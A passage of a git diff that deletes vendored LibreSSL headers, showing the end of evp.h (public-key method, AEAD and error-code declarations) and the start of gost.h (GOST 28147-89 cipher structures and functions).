-    ASN1_PCTX *pctx));
-
-void EVP_PKEY_asn1_set_free(EVP_PKEY_ASN1_METHOD *ameth,
-    void (*pkey_free)(EVP_PKEY *pkey));
-void EVP_PKEY_asn1_set_ctrl(EVP_PKEY_ASN1_METHOD *ameth,
-    int (*pkey_ctrl)(EVP_PKEY *pkey, int op, long arg1, void *arg2));
-
-#define EVP_PKEY_OP_UNDEFINED		0
-#define EVP_PKEY_OP_PARAMGEN		(1<<1)
-#define EVP_PKEY_OP_KEYGEN		(1<<2)
-#define EVP_PKEY_OP_SIGN		(1<<3)
-#define EVP_PKEY_OP_VERIFY		(1<<4)
-#define EVP_PKEY_OP_VERIFYRECOVER	(1<<5)
-#define EVP_PKEY_OP_SIGNCTX		(1<<6)
-#define EVP_PKEY_OP_VERIFYCTX		(1<<7)
-#define EVP_PKEY_OP_ENCRYPT		(1<<8)
-#define EVP_PKEY_OP_DECRYPT		(1<<9)
-#define EVP_PKEY_OP_DERIVE		(1<<10)
-
-#define EVP_PKEY_OP_TYPE_SIG	\
-	(EVP_PKEY_OP_SIGN | EVP_PKEY_OP_VERIFY | EVP_PKEY_OP_VERIFYRECOVER \
-		| EVP_PKEY_OP_SIGNCTX | EVP_PKEY_OP_VERIFYCTX)
-
-#define EVP_PKEY_OP_TYPE_CRYPT \
-	(EVP_PKEY_OP_ENCRYPT | EVP_PKEY_OP_DECRYPT)
-
-#define EVP_PKEY_OP_TYPE_NOGEN \
-	(EVP_PKEY_OP_SIG | EVP_PKEY_OP_CRYPT | EVP_PKEY_OP_DERIVE)
-
-#define EVP_PKEY_OP_TYPE_GEN \
-		(EVP_PKEY_OP_PARAMGEN | EVP_PKEY_OP_KEYGEN)
-
-#define	 EVP_PKEY_CTX_set_signature_md(ctx, md)	\
-		EVP_PKEY_CTX_ctrl(ctx, -1, EVP_PKEY_OP_TYPE_SIG,  \
-					EVP_PKEY_CTRL_MD, 0, (void *)md)
-
-#define EVP_PKEY_CTRL_MD		1
-#define EVP_PKEY_CTRL_PEER_KEY		2
-
-#define EVP_PKEY_CTRL_PKCS7_ENCRYPT	3
-#define EVP_PKEY_CTRL_PKCS7_DECRYPT	4
-
-#define EVP_PKEY_CTRL_PKCS7_SIGN	5
-
-#define EVP_PKEY_CTRL_SET_MAC_KEY	6
-
-#define EVP_PKEY_CTRL_DIGESTINIT	7
-
-/* Used by GOST key encryption in TLS */
-#define EVP_PKEY_CTRL_SET_IV 		8
-
-#define EVP_PKEY_CTRL_CMS_ENCRYPT	9
-#define EVP_PKEY_CTRL_CMS_DECRYPT	10
-#define EVP_PKEY_CTRL_CMS_SIGN		11
-
-#define EVP_PKEY_CTRL_CIPHER		12
-
-#define EVP_PKEY_ALG_CTRL		0x1000
-
-
-#define EVP_PKEY_FLAG_AUTOARGLEN	2
-/* Method handles all operations: don't assume any digest related
- * defaults.
- */
-#define EVP_PKEY_FLAG_SIGCTX_CUSTOM	4
-
-const EVP_PKEY_METHOD *EVP_PKEY_meth_find(int type);
-EVP_PKEY_METHOD* EVP_PKEY_meth_new(int id, int flags);
-void EVP_PKEY_meth_get0_info(int *ppkey_id, int *pflags,
-    const EVP_PKEY_METHOD *meth);
-void EVP_PKEY_meth_copy(EVP_PKEY_METHOD *dst, const EVP_PKEY_METHOD *src);
-void EVP_PKEY_meth_free(EVP_PKEY_METHOD *pmeth);
-int EVP_PKEY_meth_add0(const EVP_PKEY_METHOD *pmeth);
-
-EVP_PKEY_CTX *EVP_PKEY_CTX_new(EVP_PKEY *pkey, ENGINE *e);
-EVP_PKEY_CTX *EVP_PKEY_CTX_new_id(int id, ENGINE *e);
-EVP_PKEY_CTX *EVP_PKEY_CTX_dup(EVP_PKEY_CTX *ctx);
-void EVP_PKEY_CTX_free(EVP_PKEY_CTX *ctx);
-
-int EVP_PKEY_CTX_ctrl(EVP_PKEY_CTX *ctx, int keytype, int optype, int cmd,
-    int p1, void *p2);
-int EVP_PKEY_CTX_ctrl_str(EVP_PKEY_CTX *ctx, const char *type,
-    const char *value);
-
-int EVP_PKEY_CTX_get_operation(EVP_PKEY_CTX *ctx);
-void EVP_PKEY_CTX_set0_keygen_info(EVP_PKEY_CTX *ctx, int *dat, int datlen);
-
-EVP_PKEY *EVP_PKEY_new_mac_key(int type, ENGINE *e, const unsigned char *key,
-    int keylen);
-
-void EVP_PKEY_CTX_set_data(EVP_PKEY_CTX *ctx, void *data);
-void *EVP_PKEY_CTX_get_data(EVP_PKEY_CTX *ctx);
-EVP_PKEY *EVP_PKEY_CTX_get0_pkey(EVP_PKEY_CTX *ctx);
-
-EVP_PKEY *EVP_PKEY_CTX_get0_peerkey(EVP_PKEY_CTX *ctx);
-
-void EVP_PKEY_CTX_set_app_data(EVP_PKEY_CTX *ctx, void *data);
-void *EVP_PKEY_CTX_get_app_data(EVP_PKEY_CTX *ctx);
-
-int EVP_PKEY_sign_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_sign(EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
-    const unsigned char *tbs, size_t tbslen);
-int EVP_PKEY_verify_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_verify(EVP_PKEY_CTX *ctx, const unsigned char *sig, size_t siglen,
-    const unsigned char *tbs, size_t tbslen);
-int EVP_PKEY_verify_recover_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_verify_recover(EVP_PKEY_CTX *ctx, unsigned char *rout,
-    size_t *routlen, const unsigned char *sig, size_t siglen);
-int EVP_PKEY_encrypt_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_encrypt(EVP_PKEY_CTX *ctx, unsigned char *out, size_t *outlen,
-    const unsigned char *in, size_t inlen);
-int EVP_PKEY_decrypt_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_decrypt(EVP_PKEY_CTX *ctx, unsigned char *out, size_t *outlen,
-    const unsigned char *in, size_t inlen);
-
-int EVP_PKEY_derive_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_derive_set_peer(EVP_PKEY_CTX *ctx, EVP_PKEY *peer);
-int EVP_PKEY_derive(EVP_PKEY_CTX *ctx, unsigned char *key, size_t *keylen);
-
-typedef int EVP_PKEY_gen_cb(EVP_PKEY_CTX *ctx);
-
-int EVP_PKEY_paramgen_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_paramgen(EVP_PKEY_CTX *ctx, EVP_PKEY **ppkey);
-int EVP_PKEY_keygen_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY **ppkey);
-
-void EVP_PKEY_CTX_set_cb(EVP_PKEY_CTX *ctx, EVP_PKEY_gen_cb *cb);
-EVP_PKEY_gen_cb *EVP_PKEY_CTX_get_cb(EVP_PKEY_CTX *ctx);
-
-int EVP_PKEY_CTX_get_keygen_info(EVP_PKEY_CTX *ctx, int idx);
-
-void EVP_PKEY_meth_set_init(EVP_PKEY_METHOD *pmeth,
-    int (*init)(EVP_PKEY_CTX *ctx));
-
-void EVP_PKEY_meth_set_copy(EVP_PKEY_METHOD *pmeth,
-    int (*copy)(EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src));
-
-void EVP_PKEY_meth_set_cleanup(EVP_PKEY_METHOD *pmeth,
-    void (*cleanup)(EVP_PKEY_CTX *ctx));
-
-void EVP_PKEY_meth_set_paramgen(EVP_PKEY_METHOD *pmeth,
-    int (*paramgen_init)(EVP_PKEY_CTX *ctx),
-    int (*paramgen)(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey));
-
-void EVP_PKEY_meth_set_keygen(EVP_PKEY_METHOD *pmeth,
-    int (*keygen_init)(EVP_PKEY_CTX *ctx),
-    int (*keygen)(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey));
-
-void EVP_PKEY_meth_set_sign(EVP_PKEY_METHOD *pmeth,
-    int (*sign_init)(EVP_PKEY_CTX *ctx),
-    int (*sign)(EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
-    const unsigned char *tbs, size_t tbslen));
-
-void EVP_PKEY_meth_set_verify(EVP_PKEY_METHOD *pmeth,
-    int (*verify_init)(EVP_PKEY_CTX *ctx),
-    int (*verify)(EVP_PKEY_CTX *ctx, const unsigned char *sig, size_t siglen,
-    const unsigned char *tbs, size_t tbslen));
-
-void EVP_PKEY_meth_set_verify_recover(EVP_PKEY_METHOD *pmeth,
-    int (*verify_recover_init)(EVP_PKEY_CTX *ctx),
-    int (*verify_recover)(EVP_PKEY_CTX *ctx, unsigned char *sig,
-    size_t *siglen, const unsigned char *tbs, size_t tbslen));
-
-void EVP_PKEY_meth_set_signctx(EVP_PKEY_METHOD *pmeth,
-    int (*signctx_init)(EVP_PKEY_CTX *ctx, EVP_MD_CTX *mctx),
-    int (*signctx)(EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
-    EVP_MD_CTX *mctx));
-
-void EVP_PKEY_meth_set_verifyctx(EVP_PKEY_METHOD *pmeth,
-    int (*verifyctx_init)(EVP_PKEY_CTX *ctx, EVP_MD_CTX *mctx),
-    int (*verifyctx)(EVP_PKEY_CTX *ctx, const unsigned char *sig, int siglen,
-    EVP_MD_CTX *mctx));
-
-void EVP_PKEY_meth_set_encrypt(EVP_PKEY_METHOD *pmeth,
-    int (*encrypt_init)(EVP_PKEY_CTX *ctx),
-    int (*encryptfn)(EVP_PKEY_CTX *ctx, unsigned char *out, size_t *outlen,
-    const unsigned char *in, size_t inlen));
-
-void EVP_PKEY_meth_set_decrypt(EVP_PKEY_METHOD *pmeth,
-    int (*decrypt_init)(EVP_PKEY_CTX *ctx),
-    int (*decrypt)(EVP_PKEY_CTX *ctx, unsigned char *out, size_t *outlen,
-    const unsigned char *in, size_t inlen));
-
-void EVP_PKEY_meth_set_derive(EVP_PKEY_METHOD *pmeth,
-    int (*derive_init)(EVP_PKEY_CTX *ctx),
-    int (*derive)(EVP_PKEY_CTX *ctx, unsigned char *key, size_t *keylen));
-
-void EVP_PKEY_meth_set_ctrl(EVP_PKEY_METHOD *pmeth,
-    int (*ctrl)(EVP_PKEY_CTX *ctx, int type, int p1, void *p2),
-    int (*ctrl_str)(EVP_PKEY_CTX *ctx, const char *type, const char *value));
-
-/* Authenticated Encryption with Additional Data.
- *
- * AEAD couples confidentiality and integrity in a single primtive. AEAD
- * algorithms take a key and then can seal and open individual messages. Each
- * message has a unique, per-message nonce and, optionally, additional data
- * which is authenticated but not included in the output. */
-
-struct evp_aead_st;
-typedef struct evp_aead_st EVP_AEAD;
-
-#ifndef OPENSSL_NO_AES
-/* EVP_aes_128_gcm is AES-128 in Galois Counter Mode. */
-const EVP_AEAD *EVP_aead_aes_128_gcm(void);
-/* EVP_aes_256_gcm is AES-256 in Galois Counter Mode. */
-const EVP_AEAD *EVP_aead_aes_256_gcm(void);
-#endif
-
-#if !defined(OPENSSL_NO_CHACHA) && !defined(OPENSSL_NO_POLY1305)
-/* EVP_aead_chacha20_poly1305 is ChaCha20 with a Poly1305 authenticator. */
-const EVP_AEAD *EVP_aead_chacha20_poly1305(void);
-#endif
-
-/* EVP_AEAD_key_length returns the length of the keys used. */
-size_t EVP_AEAD_key_length(const EVP_AEAD *aead);
-
-/* EVP_AEAD_nonce_length returns the length of the per-message nonce. */
-size_t EVP_AEAD_nonce_length(const EVP_AEAD *aead);
-
-/* EVP_AEAD_max_overhead returns the maximum number of additional bytes added
- * by the act of sealing data with the AEAD. */
-size_t EVP_AEAD_max_overhead(const EVP_AEAD *aead);
-
-/* EVP_AEAD_max_tag_len returns the maximum tag length when using this AEAD.
- * This * is the largest value that can be passed as a tag length to
- * EVP_AEAD_CTX_init. */
-size_t EVP_AEAD_max_tag_len(const EVP_AEAD *aead);
-
-/* An EVP_AEAD_CTX represents an AEAD algorithm configured with a specific key
- * and message-independent IV. */
-typedef struct evp_aead_ctx_st {
-	const EVP_AEAD *aead;
-	/* aead_state is an opaque pointer to the AEAD specific state. */
-	void *aead_state;
-} EVP_AEAD_CTX;
-
-/* EVP_AEAD_MAX_TAG_LENGTH is the maximum tag length used by any AEAD
- * defined in this header. */
-#define EVP_AEAD_MAX_TAG_LENGTH 16
-
-/* EVP_AEAD_DEFAULT_TAG_LENGTH is a magic value that can be passed to
- * EVP_AEAD_CTX_init to indicate that the default tag length for an AEAD
- * should be used. */
-#define EVP_AEAD_DEFAULT_TAG_LENGTH 0
-
-/* EVP_AEAD_init initializes the context for the given AEAD algorithm.
- * The implementation argument may be NULL to choose the default implementation.
- * Authentication tags may be truncated by passing a tag length. A tag length
- * of zero indicates the default tag length should be used. */
-int EVP_AEAD_CTX_init(EVP_AEAD_CTX *ctx, const EVP_AEAD *aead,
-    const unsigned char *key, size_t key_len, size_t tag_len, ENGINE *impl);
-
-/* EVP_AEAD_CTX_cleanup frees any data allocated for this context. */
-void EVP_AEAD_CTX_cleanup(EVP_AEAD_CTX *ctx);
-
-/* EVP_AEAD_CTX_seal encrypts and authenticates the input and authenticates
- * any additional data (AD), the result being written as output. One is
- * returned on success, otherwise zero.
- *
- * This function may be called (with the same EVP_AEAD_CTX) concurrently with
- * itself or EVP_AEAD_CTX_open.
- *
- * At most max_out_len bytes are written as output and, in order to ensure
- * success, this value should be the length of the input plus the result of
- * EVP_AEAD_overhead. On successful return, out_len is set to the actual
- * number of bytes written.
- *
- * The length of the nonce is must be equal to the result of
- * EVP_AEAD_nonce_length for this AEAD.
- *
- * EVP_AEAD_CTX_seal never results in a partial output. If max_out_len is
- * insufficient, zero will be returned and out_len will be set to zero.
- *
- * If the input and output are aliased then out must be <= in. */
-int EVP_AEAD_CTX_seal(const EVP_AEAD_CTX *ctx, unsigned char *out,
-    size_t *out_len, size_t max_out_len, const unsigned char *nonce,
-    size_t nonce_len, const unsigned char *in, size_t in_len,
-    const unsigned char *ad, size_t ad_len);
-
-/* EVP_AEAD_CTX_open authenticates the input and additional data, decrypting
- * the input and writing it as output. One is returned on success, otherwise
- * zero.
- *
- * This function may be called (with the same EVP_AEAD_CTX) concurrently with
- * itself or EVP_AEAD_CTX_seal.
- *
- * At most the number of input bytes are written as output. In order to ensure
- * success, max_out_len should be at least the same as the input length. On
- * successful return out_len is set to the actual number of bytes written.
- *
- * The length of nonce must be equal to the result of EVP_AEAD_nonce_length
- * for this AEAD.
- *
- * EVP_AEAD_CTX_open never results in a partial output. If max_out_len is
- * insufficient, zero will be returned and out_len will be set to zero.
- *
- * If the input and output are aliased then out must be <= in. */
-int EVP_AEAD_CTX_open(const EVP_AEAD_CTX *ctx, unsigned char *out,
-    size_t *out_len, size_t max_out_len, const unsigned char *nonce,
-    size_t nonce_len, const unsigned char *in, size_t in_len,
-    const unsigned char *ad, size_t ad_len);
-
-void EVP_add_alg_module(void);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_EVP_strings(void);
-
-/* Error codes for the EVP functions. */
-
-/* Function codes. */
-#define EVP_F_AEAD_AES_GCM_INIT				 187
-#define EVP_F_AEAD_AES_GCM_OPEN				 188
-#define EVP_F_AEAD_AES_GCM_SEAL				 189
-#define EVP_F_AEAD_CHACHA20_POLY1305_INIT		 192
-#define EVP_F_AEAD_CHACHA20_POLY1305_OPEN		 193
-#define EVP_F_AEAD_CHACHA20_POLY1305_SEAL		 194
-#define EVP_F_AEAD_CTX_OPEN				 185
-#define EVP_F_AEAD_CTX_SEAL				 186
-#define EVP_F_AESNI_INIT_KEY				 165
-#define EVP_F_AESNI_XTS_CIPHER				 176
-#define EVP_F_AES_INIT_KEY				 133
-#define EVP_F_AES_XTS					 172
-#define EVP_F_AES_XTS_CIPHER				 175
-#define EVP_F_ALG_MODULE_INIT				 177
-#define EVP_F_CAMELLIA_INIT_KEY				 159
-#define EVP_F_CMAC_INIT					 173
-#define EVP_F_D2I_PKEY					 100
-#define EVP_F_DO_SIGVER_INIT				 161
-#define EVP_F_DSAPKEY2PKCS8				 134
-#define EVP_F_DSA_PKEY2PKCS8				 135
-#define EVP_F_ECDSA_PKEY2PKCS8				 129
-#define EVP_F_ECKEY_PKEY2PKCS8				 132
-#define EVP_F_EVP_AEAD_CTX_INIT				 180
-#define EVP_F_EVP_AEAD_CTX_OPEN				 190
-#define EVP_F_EVP_AEAD_CTX_SEAL				 191
-#define EVP_F_EVP_BYTESTOKEY				 200
-#define EVP_F_EVP_CIPHERINIT_EX				 123
-#define EVP_F_EVP_CIPHER_CTX_COPY			 163
-#define EVP_F_EVP_CIPHER_CTX_CTRL			 124
-#define EVP_F_EVP_CIPHER_CTX_SET_KEY_LENGTH		 122
-#define EVP_F_EVP_CIPHER_GET_ASN1_IV			 201
-#define EVP_F_EVP_CIPHER_SET_ASN1_IV			 202
-#define EVP_F_EVP_DECRYPTFINAL_EX			 101
-#define EVP_F_EVP_DECRYPTUPDATE				 199
-#define EVP_F_EVP_DIGESTFINAL_EX			 196
-#define EVP_F_EVP_DIGESTINIT_EX				 128
-#define EVP_F_EVP_ENCRYPTFINAL_EX			 127
-#define EVP_F_EVP_ENCRYPTUPDATE				 198
-#define EVP_F_EVP_MD_CTX_COPY_EX			 110
-#define EVP_F_EVP_MD_CTX_CTRL				 195
-#define EVP_F_EVP_MD_SIZE				 162
-#define EVP_F_EVP_OPENINIT				 102
-#define EVP_F_EVP_PBE_ALG_ADD				 115
-#define EVP_F_EVP_PBE_ALG_ADD_TYPE			 160
-#define EVP_F_EVP_PBE_CIPHERINIT			 116
-#define EVP_F_EVP_PKCS82PKEY				 111
-#define EVP_F_EVP_PKCS82PKEY_BROKEN			 136
-#define EVP_F_EVP_PKEY2PKCS8_BROKEN			 113
-#define EVP_F_EVP_PKEY_COPY_PARAMETERS			 103
-#define EVP_F_EVP_PKEY_CTX_CTRL				 137
-#define EVP_F_EVP_PKEY_CTX_CTRL_STR			 150
-#define EVP_F_EVP_PKEY_CTX_DUP				 156
-#define EVP_F_EVP_PKEY_DECRYPT				 104
-#define EVP_F_EVP_PKEY_DECRYPT_INIT			 138
-#define EVP_F_EVP_PKEY_DECRYPT_OLD			 151
-#define EVP_F_EVP_PKEY_DERIVE				 153
-#define EVP_F_EVP_PKEY_DERIVE_INIT			 154
-#define EVP_F_EVP_PKEY_DERIVE_SET_PEER			 155
-#define EVP_F_EVP_PKEY_ENCRYPT				 105
-#define EVP_F_EVP_PKEY_ENCRYPT_INIT			 139
-#define EVP_F_EVP_PKEY_ENCRYPT_OLD			 152
-#define EVP_F_EVP_PKEY_GET1_DH				 119
-#define EVP_F_EVP_PKEY_GET1_DSA				 120
-#define EVP_F_EVP_PKEY_GET1_ECDSA			 130
-#define EVP_F_EVP_PKEY_GET1_EC_KEY			 131
-#define EVP_F_EVP_PKEY_GET1_RSA				 121
-#define EVP_F_EVP_PKEY_KEYGEN				 146
-#define EVP_F_EVP_PKEY_KEYGEN_INIT			 147
-#define EVP_F_EVP_PKEY_NEW				 106
-#define EVP_F_EVP_PKEY_PARAMGEN				 148
-#define EVP_F_EVP_PKEY_PARAMGEN_INIT			 149
-#define EVP_F_EVP_PKEY_SIGN				 140
-#define EVP_F_EVP_PKEY_SIGN_INIT			 141
-#define EVP_F_EVP_PKEY_VERIFY				 142
-#define EVP_F_EVP_PKEY_VERIFY_INIT			 143
-#define EVP_F_EVP_PKEY_VERIFY_RECOVER			 144
-#define EVP_F_EVP_PKEY_VERIFY_RECOVER_INIT		 145
-#define EVP_F_EVP_RIJNDAEL				 126
-#define EVP_F_EVP_SIGNFINAL				 107
-#define EVP_F_EVP_VERIFYFINAL				 108
-#define EVP_F_FIPS_CIPHERINIT				 166
-#define EVP_F_FIPS_CIPHER_CTX_COPY			 170
-#define EVP_F_FIPS_CIPHER_CTX_CTRL			 167
-#define EVP_F_FIPS_CIPHER_CTX_SET_KEY_LENGTH		 171
-#define EVP_F_FIPS_DIGESTINIT				 168
-#define EVP_F_FIPS_MD_CTX_COPY				 169
-#define EVP_F_HMAC_INIT_EX				 174
-#define EVP_F_INT_CTX_NEW				 157
-#define EVP_F_PKCS5_PBE_KEYIVGEN			 117
-#define EVP_F_PKCS5_V2_PBE_KEYIVGEN			 118
-#define EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN			 164
-#define EVP_F_PKCS8_SET_BROKEN				 112
-#define EVP_F_PKEY_SET_TYPE				 158
-#define EVP_F_RC2_GET_ASN1_TYPE_AND_IV			 197
-#define EVP_F_RC2_MAGIC_TO_METH				 109
-#define EVP_F_RC5_CTRL					 125
-
-/* Reason codes. */
-#define EVP_R_AES_IV_SETUP_FAILED			 162
-#define EVP_R_AES_KEY_SETUP_FAILED			 143
-#define EVP_R_ASN1_LIB					 140
-#define EVP_R_BAD_BLOCK_LENGTH				 136
-#define EVP_R_BAD_DECRYPT				 100
-#define EVP_R_BAD_KEY_LENGTH				 137
-#define EVP_R_BN_DECODE_ERROR				 112
-#define EVP_R_BN_PUBKEY_ERROR				 113
-#define EVP_R_BUFFER_TOO_SMALL				 155
-#define EVP_R_CAMELLIA_KEY_SETUP_FAILED			 157
-#define EVP_R_CIPHER_PARAMETER_ERROR			 122
-#define EVP_R_COMMAND_NOT_SUPPORTED			 147
-#define EVP_R_CTRL_NOT_IMPLEMENTED			 132
-#define EVP_R_CTRL_OPERATION_NOT_IMPLEMENTED		 133
-#define EVP_R_DATA_NOT_MULTIPLE_OF_BLOCK_LENGTH		 138
-#define EVP_R_DECODE_ERROR				 114
-#define EVP_R_DIFFERENT_KEY_TYPES			 101
-#define EVP_R_DIFFERENT_PARAMETERS			 153
-#define EVP_R_DISABLED_FOR_FIPS				 163
-#define EVP_R_ENCODE_ERROR				 115
-#define EVP_R_ERROR_LOADING_SECTION			 165
-#define EVP_R_ERROR_SETTING_FIPS_MODE			 166
-#define EVP_R_EVP_PBE_CIPHERINIT_ERROR			 119
-#define EVP_R_EXPECTING_AN_RSA_KEY			 127
-#define EVP_R_EXPECTING_A_DH_KEY			 128
-#define EVP_R_EXPECTING_A_DSA_KEY			 129
-#define EVP_R_EXPECTING_A_ECDSA_KEY			 141
-#define EVP_R_EXPECTING_A_EC_KEY			 142
-#define EVP_R_FIPS_MODE_NOT_SUPPORTED			 167
-#define EVP_R_INITIALIZATION_ERROR			 134
-#define EVP_R_INPUT_NOT_INITIALIZED			 111
-#define EVP_R_INVALID_DIGEST				 152
-#define EVP_R_INVALID_FIPS_MODE				 168
-#define EVP_R_INVALID_KEY_LENGTH			 130
-#define EVP_R_INVALID_OPERATION				 148
-#define EVP_R_IV_TOO_LARGE				 102
-#define EVP_R_KEYGEN_FAILURE				 120
-#define EVP_R_MESSAGE_DIGEST_IS_NULL			 159
-#define EVP_R_METHOD_NOT_SUPPORTED			 144
-#define EVP_R_MISSING_PARAMETERS			 103
-#define EVP_R_NO_CIPHER_SET				 131
-#define EVP_R_NO_DEFAULT_DIGEST				 158
-#define EVP_R_NO_DIGEST_SET				 139
-#define EVP_R_NO_DSA_PARAMETERS				 116
-#define EVP_R_NO_KEY_SET				 154
-#define EVP_R_NO_OPERATION_SET				 149
-#define EVP_R_NO_SIGN_FUNCTION_CONFIGURED		 104
-#define EVP_R_NO_VERIFY_FUNCTION_CONFIGURED		 105
-#define EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE	 150
-#define EVP_R_OPERATON_NOT_INITIALIZED			 151
-#define EVP_R_OUTPUT_ALIASES_INPUT			 172
-#define EVP_R_PKCS8_UNKNOWN_BROKEN_TYPE			 117
-#define EVP_R_PRIVATE_KEY_DECODE_ERROR			 145
-#define EVP_R_PRIVATE_KEY_ENCODE_ERROR			 146
-#define EVP_R_PUBLIC_KEY_NOT_RSA			 106
-#define EVP_R_TAG_TOO_LARGE				 171
-#define EVP_R_TOO_LARGE					 164
-#define EVP_R_UNKNOWN_CIPHER				 160
-#define EVP_R_UNKNOWN_DIGEST				 161
-#define EVP_R_UNKNOWN_OPTION				 169
-#define EVP_R_UNKNOWN_PBE_ALGORITHM			 121
-#define EVP_R_UNSUPORTED_NUMBER_OF_ROUNDS		 135
-#define EVP_R_UNSUPPORTED_ALGORITHM			 156
-#define EVP_R_UNSUPPORTED_CIPHER			 107
-#define EVP_R_UNSUPPORTED_KEYLENGTH			 123
-#define EVP_R_UNSUPPORTED_KEY_DERIVATION_FUNCTION	 124
-#define EVP_R_UNSUPPORTED_KEY_SIZE			 108
-#define EVP_R_UNSUPPORTED_PRF				 125
-#define EVP_R_UNSUPPORTED_PRIVATE_KEY_ALGORITHM		 118
-#define EVP_R_UNSUPPORTED_SALT_TYPE			 126
-#define EVP_R_WRONG_FINAL_BLOCK_LENGTH			 109
-#define EVP_R_WRONG_PUBLIC_KEY_TYPE			 110
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/gost.h b/thirdparty/libressl/include/openssl/gost.h
deleted file mode 100644
index 092f96f..0000000
--- a/thirdparty/libressl/include/openssl/gost.h
+++ /dev/null
@@ -1,266 +0,0 @@
-/* $OpenBSD: gost.h,v 1.3 2016/09/04 17:02:31 jsing Exp $ */
-/*
- * Copyright (c) 2014 Dmitry Eremin-Solenikov <dbaryshkov@gmail.com>
- * Copyright (c) 2005-2006 Cryptocom LTD
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- */
-
-#ifndef HEADER_GOST_H
-#define HEADER_GOST_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_GOST
-#error GOST is disabled.
-#endif
-
-#include <openssl/asn1t.h>
-#include <openssl/ec.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-typedef struct gost2814789_key_st {
-	unsigned int key[8];
-	unsigned int k87[256],k65[256],k43[256],k21[256];
-	unsigned int count;
-	unsigned key_meshing : 1;
-} GOST2814789_KEY;
-
-int Gost2814789_set_sbox(GOST2814789_KEY *key, int nid);
-int Gost2814789_set_key(GOST2814789_KEY *key,
-		const unsigned char *userKey, const int bits);
-void Gost2814789_ecb_encrypt(const unsigned char *in, unsigned char *out,
-	GOST2814789_KEY *key, const int enc);
-void Gost2814789_cfb64_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, GOST2814789_KEY *key,
-	unsigned char *ivec, int *num, const int enc);
-void Gost2814789_cnt_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, GOST2814789_KEY *key,
-	unsigned char *ivec, unsigned char *cnt_buf, int *num);
-
-typedef struct {
-	ASN1_OCTET_STRING *iv;
-	ASN1_OBJECT *enc_param_set;
-} GOST_CIPHER_PARAMS;
-
-GOST_CIPHER_PARAMS *GOST_CIPHER_PARAMS_new(void);
-void GOST_CIPHER_PARAMS_free(GOST_CIPHER_PARAMS *a);
-GOST_CIPHER_PARAMS *d2i_GOST_CIPHER_PARAMS(GOST_CIPHER_PARAMS **a, const unsigned char **in, long len);
-int i2d_GOST_CIPHER_PARAMS(GOST_CIPHER_PARAMS *a, unsigned char **out);
-extern const ASN1_ITEM GOST_CIPHER_PARAMS_it;
-
-#define GOST2814789IMIT_LENGTH 4
-#define GOST2814789IMIT_CBLOCK 8
-#define GOST2814789IMIT_LONG unsigned int
-
-typedef struct GOST2814789IMITstate_st {
-	GOST2814789IMIT_LONG	Nl, Nh;
-	unsigned char		data[GOST2814789IMIT_CBLOCK];
-	unsigned int		num;
-
-	GOST2814789_KEY		cipher;
-	unsigned char		mac[GOST2814789IMIT_CBLOCK];
-} GOST2814789IMIT_CTX;
-
-/* Note, also removed second parameter and removed dctx->cipher setting */
-int GOST2814789IMIT_Init(GOST2814789IMIT_CTX *c, int nid);
